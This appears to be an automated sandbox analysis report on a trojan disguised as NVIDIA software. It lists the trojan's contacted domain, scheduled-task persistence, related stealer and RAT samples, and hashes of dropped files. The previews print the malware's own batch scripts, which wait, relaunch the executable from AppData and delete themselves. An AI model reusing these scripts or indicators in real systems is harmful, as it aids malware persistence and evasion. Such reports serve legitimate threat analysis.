                                    http://bibaprog.ruhBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.000000000302D000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000003115000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.000000000398E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000003121000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.000000000314B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://bibaprog.ru/hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNVIDIA Container.exe, 00000005.00000002.2111607409.00000000038E7000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.21.64.1
                                      bibaprog.ruUnited States
                                      13335CLOUDFLARENETUStrue
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1590022
                                      Start date and time:2025-01-13 13:36:09 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 13m 11s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:76
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:NVIDIAShare.exe.bin.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@106/78@1/1
                                      EGA Information:
                                      • Successful, ratio: 85.7%
                                      HCA Information:
                                      • Successful, ratio: 57%
                                      • Number of executed functions: 329
                                      • Number of non-executed functions: 98
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target hBoBqOIwjXsCbkOMEKwZ.exe, PID 6512 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: NVIDIAShare.exe.bin.exe
                                      TimeTypeDescription
                                      07:37:12API Interceptor9x Sleep call for process: hBoBqOIwjXsCbkOMEKwZ.exe modified
                                      13:37:07Task SchedulerRun new task: hBoBqOIwjXsCbkOMEKwZ path: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                      13:37:07Task SchedulerRun new task: hBoBqOIwjXsCbkOMEKwZh path: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.21.64.1gem2.exeGet hashmaliciousUnknownBrowse
                                      • securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                      SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                      • www.mffnow.info/0pqe/
                                      4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                      • www.vilakodsiy.sbs/w7eo/
                                      1162-201.exeGet hashmaliciousFormBookBrowse
                                      • www.mzkd6gp5.top/utww/
                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                      • www.mzkd6gp5.top/3u0p/
                                      Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                      • ordrr.statementquo.com/QCbxA/
                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                      • adsfirm.com/administrator/index.php
                                      PO2412010.exeGet hashmaliciousFormBookBrowse
                                      • www.bser101pp.buzz/v89f/
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSDOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      bridgenet.exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 104.21.112.1
                                      rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 104.21.32.1
                                      NursultanAlphaCrack.bat.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 104.21.80.1
                                      recode.exeGet hashmaliciousHTMLPhisherBrowse
                                      • 104.21.16.1
                                      MB263350411AE.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 104.21.112.1
                                      RFQ PC25-1301 Product Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                      • 104.21.80.156
                                      QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.112.1
                                      Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                      • 104.21.32.1
                                      SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 104.21.112.1
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\AAjFTaDk.logGameHackBuild1.exe.bin.exeGet hashmaliciousDCRat, OrcusBrowse
                                        XenoSetup(2).exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          SAMP_CHEAT_ATVECHAU2.exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            SPISOK_DENEG.exeGet hashmaliciousDCRatBrowse
                                              ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                DCobxod.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  fatality.exeGet hashmaliciousCryptOne, DCRat, Mofksys, PureLog Stealer, zgRATBrowse
                                                    NursultanAlphaCrack.bat.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      SearchIndexer.exeGet hashmaliciousDCRat, Neshta, PureLog Stealer, zgRATBrowse
                                                        fatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1396
                                                          Entropy (8bit):5.350961817021757
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1830
                                                          Entropy (8bit):5.3661116947161815
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
                                                          MD5:C2E0F17D6A14A9837FE55EE183305037
                                                          SHA1:EB56F87DAE280A52D91E88872777FDEEB2E1DF76
                                                          SHA-256:8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
                                                          SHA-512:F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):183
                                                          Entropy (8bit):5.258143107090915
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAILir8:hCRLuVFOOr+DE19231JMYKOZG1923feY
                                                          MD5:CF6E45C52686C51C3C3C56EF7CE05498
                                                          SHA1:A95411BD3B0F4882610353EB83B65AD5C92C3A3D
                                                          SHA-256:5D1A60D8C83DC1D775442C5B0D7D3FEAAA4077B01E4FB2358AA073D85BDC7ACA
                                                          SHA-512:CDB1AB17AD35BB0CFE40D7ADEA66011886ECA495187C71AE5285C998B1B3FB4F4A818CC409D22F26573CBAFB71CC0649E9639767F78F27D7E51A9B43693BD209
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1LArpmQ7xZ.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):5.289540388586316
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE19231JMYKOZG1923fVH:HTg9uYDEiLvtH
                                                          MD5:78A08188D1A73ADEE3FF99099F7BE09A
                                                          SHA1:D83063AA46A571A7DFA8F8BA0CD7D83FA579CEBC
                                                          SHA-256:2EB0D9B0FC70F42568938B3517DC071C13910DB19E60A1DAA41AA2B1186E5C10
                                                          SHA-512:A80DD5DCE38F3332A197A66C370D5980CD23F691AF4B7DD72B3DDAB47560E319B1D346D4BAFEFC6F57B3A333734F35A36853AE17768EEDFE8F9AAC37C9D518EE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1QWUF8ga47.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):183
                                                          Entropy (8bit):5.275101593690698
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAI2khn:hCRLuVFOOr+DE19231JMYKOZG1923fF
                                                          MD5:56EB28A0460FDAF23704C0EF815B3DBD
                                                          SHA1:CD1D919A7203A64EF91E104A18E88EE1ABEE962C
                                                          SHA-256:04E2A5F49AD6A931FE62CFAF928FAD0B234CFF3214CF9C909510B1A969F5384B
                                                          SHA-512:2F9D3875290860F4E9D4CC5121E58A21EA416591BD7C436F3D8E237A6E27222B784E67E7A842925CC234C379A8301F16168992E5293EF326784D270CEC540241
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\B0uJAwGmBV.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):183
                                                          Entropy (8bit):5.247988513921934
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1Ukh4E2J5Nn5SP6MYBktKcKZG1Ukh4E2J5xAI+wen:hCRLuVFOOr+DE19231JMYKOZG1923fTe
                                                          MD5:5AB2AA58099FF3FB7E0EEC501DDF7BF0
                                                          SHA1:6B0DE16DE79E590A2FCDE6DDAEA8CC1CC8267791
                                                          SHA-256:85510FFEBB4E336377A7ACF6F5C69F95F96BD7D2FC39A095EF5146C117993D62
                                                          SHA-512:42715618AD9ED3C6C46FFB1211E4279F989A542CFB3439ED41EE9744E776DECAD2E35E267FB1AB327D8AC027810C873615E7DBED4C11589DAC2D65CFB6BEC386
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FuUFRpewDb.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):5.247565868670826
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE19231JMYKOZG1923fa:HTg9uYDEiLvy
                                                          MD5:F0678F423F3F613B70B7C68945062545
                                                          SHA1:F6336951D61B47EE2CA799604C029227017A4967
                                                          SHA-256:E682C28BFA3F8D5C2B4CE8435789B1778F7851789098A7B0BBD2C17D218257A0
                                                          SHA-512:7BB04134937C04739E5E80ADC5235872B84ED6A5024F079350646BF3F34C5071FDF698CFD316E9E75445364C8587117E3128D60000D8978DC9B012A72B4EFB89
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\L4pr7KvdK9.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.133660689688185
                                                          Encrypted:false
                                                          SSDEEP:3:SzgQ39:S5N
                                                          MD5:702E0C54E725556E08238E7CCEA2A362
                                                          SHA1:13A7813E015C1CD7FA6B74964C8176EC15B22FF1
                                                          SHA-256:F0D73A2B5BB085C6B1050418F381558BC843ED28062952B8EAD0AB699A538D05
                                                          SHA-512:849D878AD271E7A382BB70F2D5198414099D5DDF4EA2F51BBB47E7D99664A2BF8EAD7D338A589CF60E106F95BF05C978F637CD18E578128DB49144FDB14D7EB4
                                                          Malicious:false
                                                          Preview:UGlqwAlFjEafrY7XhrSRrZRUX
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.293660689688184
                                                          Encrypted:false
                                                          SSDEEP:3:8yxpRez:/xDo
                                                          MD5:B9858B025BFD2A6EA126AA3EE04EDF8C
                                                          SHA1:470F234909FEB302089CA649C0D1A46EF7B2BC33
                                                          SHA-256:5202F167221FBA7D044572EF2F8124CDD2FEB708518F3391A15F099495EB50BF
                                                          SHA-512:8C83381D9A682518F3BFBF55202363EEB5DF5D5661AA1A2404903C79C0259194A82AFC68256B4F033A94C7B349C08C09770C84E7036530678AA2B79EA75B9765
                                                          Malicious:false
                                                          Preview:WoYZj58tnYhesK8pPWufFGY36
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.403856189774724
                                                          Encrypted:false
                                                          SSDEEP:3:yH2OnWO9rjUOn:yWOn/n
                                                          MD5:AE016F320F182A84D9C1694F10639DC7
                                                          SHA1:019E7D95DC90311310023E84417ED508EF1BD32C
                                                          SHA-256:A5A571DFF3810E3FFB10067CC0D72BFF5CEA30B1FECC256EA4E90B1479A664A3
                                                          SHA-512:024C401A3F3A68D820F3BE85DA017677872CDEB1473FABD4ADDEB2C6446C471789C0F534702D62FB10DD3D7EEDBAFAD65765E1D4F2FCFC64682E1936E65E9E8F
                                                          Malicious:false
                                                          Preview:TIlbJKkzjsAODihBRNV9seTYz
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):5.203925418466176
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE19231JMYKOZG1923fpmvK:HTg9uYDEiLvRmvK
                                                          MD5:23D15FE140C4357007BA0347665DDD08
                                                          SHA1:1C5D0C6E48AB71D3F242295EBC9165CE250C33C7
                                                          SHA-256:30E1F3DC21FE1C1D0CC91FF6EE742B0E1F5BDCC318945B9AC0230E346759BA64
                                                          SHA-512:4E4B77BFB72E608772E6CCCF428242AAFA4892AF326BF2EBCC357938598B883C08E4701981A06D824966D94BB6AEE06A102EF50C069EAEEC9EF2DCEA0D483AC8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\cMdeBf80Aw.bat"
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):152
                                                          Entropy (8bit):5.6486467576016866
                                                          Encrypted:false
                                                          SSDEEP:3:XttktgkwVUTcVUWgdfhLJFTLvZy6vOjj8KMz3AeAhQgfXvuPkHBhCZHqnv:dlmTc2dpzrvfKMbAe0fXGPkHBhC+
                                                          MD5:203B8AAFE22D5A12D150DEB3945FBDFC
                                                          SHA1:BBB8BA37F035C460FFFA56F99C2D9F34E5C9FBF3
                                                          SHA-256:5C2787A5DE709B79232B7391A462C79F88365AF311E8119C3E59D9C339B1085B
                                                          SHA-512:22B6423AC9EC50E2BDA18CA50213F419E4711CFCA72EE6406E90781B8B9E6F7D5FB0DD52F7344063A9DD54A72916272B07B0FB282BB762667205F638B9407749
                                                          Malicious:false
                                                          Preview:H4sIAAAAAAAEAItWcraKiQktTi0qjolJzEnLzwPSjgUFLokliTExPvnJiTkxMRlO+U6F/p7lWRHFzknZ/r6u3uVReqkVqUo6eHUH5SfmZualx8T4hXm6eDrCaAXn/LySxMy81CKwGbEAjbOBQYMAAAA=
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.403856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:BVrPlmwLX:DPpX
                                                          MD5:DA583BFCB0C1DA3282C196B240D86218
                                                          SHA1:3B2CAE18464A9CCFBD49B391A3A068AFE64B630C
                                                          SHA-256:014536B381E524DF14C031147E1863666996F0063614F2A904ADFBEB639A51D9
                                                          SHA-512:C8C7F52119E14AB686863147C731D50C6D68579DE20DC2750A141808BEE26F925CE1FBD927093084AF3F2CF7969C2AF3110C9942202FFF3F2759845E968841D4
                                                          Malicious:false
                                                          Preview:NiImkpJ6OuMwzFtCAG1b6ZFzr
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):5.200945218408088
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE19231JMYKOZG1923f7qG:HTg9uYDEiLv9
                                                          MD5:1D7931E4BFD70CE3460A612F6E3210B2
                                                          SHA1:753EDC0FD40D15E03A1DBC9F4055EEBA4848AFED
                                                          SHA-256:2E4E57DBE3A7D89E84012EC3C2DE2142974285078EF4931625C0663851DFE555
                                                          SHA-512:668E5DF62C17E64DC29EAF9CF4CE249FE78798975C855FDDF74061EC3C8636FCB7E75861593D20BC0A9E2F18ED54962B25F972F53462A86C08E15B13E45EE9F7
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ij3ogloIkp.bat"
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.4838561897747224
                                                          Encrypted:false
                                                          SSDEEP:3:LGkRAHSVzo5R:LbRimzcR
                                                          MD5:1E3A7A83A748EC835D6A1D0254A68C0B
                                                          SHA1:2E2D983C491ADCA4D686CE04A89F72CFD9906EB0
                                                          SHA-256:42538FACE4749A5BADE71A69EDCE664AB2FD157092978E1C8903D865EB624073
                                                          SHA-512:9BA4926AB16937B0968E61D74C365FFBE49FD89419D3529BA2970BEE28190C0A1A91B7C985822CFC11006E4971CC70258BAA57711B4B0BF73766965D99F0512C
                                                          Malicious:false
                                                          Preview:aClh5v17WoCtrSRb70VM8g9eQ
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.243856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:SZkTQ+D3Tn:zb
                                                          MD5:0EDDA566B1B1B42FE48CC6F62C0C0003
                                                          SHA1:95F1029C09760EA3B2F2E6559281415604C45BFA
                                                          SHA-256:1A90847376483C586F1229DB6F50D10A188F247375C7A9D6D5A30FFF41EF069C
                                                          SHA-512:8323E016F4FE8662AF9BDCBF5D3B573B142E9498C9E39DC72A48187E8F35A5A13F09449E00B3942DA7DBE16D55F147F3A28462CF95C2A4775F8B6A2FDC072965
                                                          Malicious:false
                                                          Preview:HOdrN6fEmA8Uddeud5B1m3aRv
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.243856189774724
                                                          Encrypted:false
                                                          SSDEEP:3:6+UnjhjjZ:6+UdjjZ
                                                          MD5:0070C8A0362C346B52E918E3AF285E00
                                                          SHA1:91522CD85834EC171DDF0C0C6B19E576AE169BD5
                                                          SHA-256:461AE4E313BC1FD4360E5876DBE482C830583339AC33AE47845493D8AB108A85
